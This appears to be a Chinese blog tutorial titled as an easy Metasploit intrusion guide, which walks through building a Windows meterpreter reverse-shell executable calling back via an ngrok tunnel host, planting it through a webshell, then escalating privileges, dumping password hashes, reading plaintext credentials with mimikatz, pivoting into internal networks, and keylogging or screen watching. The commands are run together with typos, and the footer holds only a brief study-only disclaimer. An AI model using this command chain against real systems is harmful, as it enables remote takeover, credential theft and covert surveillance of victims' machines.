Metasploit:轻松入侵,掌控全局!

摘要

Metasploit是一款神奇的安全漏洞检测工具,能够轻松发现数百个软件漏洞,被誉为“黑掉宇宙”的利器。让我们一起来探索它的强大功能吧!

正文

【摘要】一、简介:Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。二、bind_tcp弹个shell:我还没写~三、revers_tcp弹个shell:sun…

一、简介:

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。

二、bind_tcp弹个shell:

我还没写~

三、revers_tcp弹个shell:

sunny clientid 隧道id 即可启动服务生成反弹shellmsfvenom -p Windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=19286 -f exe > /tmp/reverse.exeMsfconsole#启动msfuse exploit/multi/handler#监听set payload windows/meterpreter/reverse_tcp#设置payload reverse_tcpset LHOST 0.0.0.0#设置本地监听所有IPset LPORT 端口#设置本地监听端口4444run即可然后上传reverse.exe至webshell运行revers.exe此时等待一会儿发现本机已经建立会话getuid //发现权限较低,为usergetsystem //提权migrate pid //进程注入提权hashdump //下载hashload mimikaz //读取明文pawdmeterpreter下: shell //进入对方shellportfwd add -l 本机端口 -r 远程主机IP -p 远程主机端口 //内网转发rdesktop a 32 127.0.0.1:本机端口 //远程链接moudle //模块payload //攻击载荷msvenom //msfpayload,msfencode的结合体msvenom -p 攻击载荷 -LHOST 本地IP -LPORT 本地端口 -f 文件格式 -o 输出目录use exploit/multi/handler 监听模块set payload 相同攻击载荷set lhost 0.0.0.0set lport 本地端口//建立会话后jobs 停止获取sessions -l //列出sessionsession -i id //进入meterpreter之后的对于具体操作 输入-help 或 ? 即可获取帮助比如键盘记录啊、屏幕监控run vnc等等的~

就到这里了,也可以使用background后,使用msf的exploit提权

关注不迷路

扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!

温馨提示:如果您访问和下载本站资源,表示您已同意只将下载文件用于研究、学习而非其他用途。
文章版权声明 1、本网站名称:宇凡盒子
2、本站文章未经许可,禁止转载!
3、如果文章内容介绍中无特别注明,本网站压缩包解压需要密码统一是:yufanbox.com
4、本站仅供资源信息交流学习,不保证资源的可用及完整性,不提供安装使用及技术服务。点此了解
5、如果您发现本站分享的资源侵犯了您的权益,请及时通知我们,我们会在接到通知后及时处理!提交入口
0

评论0

请先

站点公告

🚀 【宇凡盒子】全网资源库转储中心

👉 注册即送VIP权限👈

👻 全站资源免费下载✅,欢迎注册!

记得 【收藏】+【关注】 谢谢!~~~

立即注册
没有账号?注册  忘记密码?

社交账号快速登录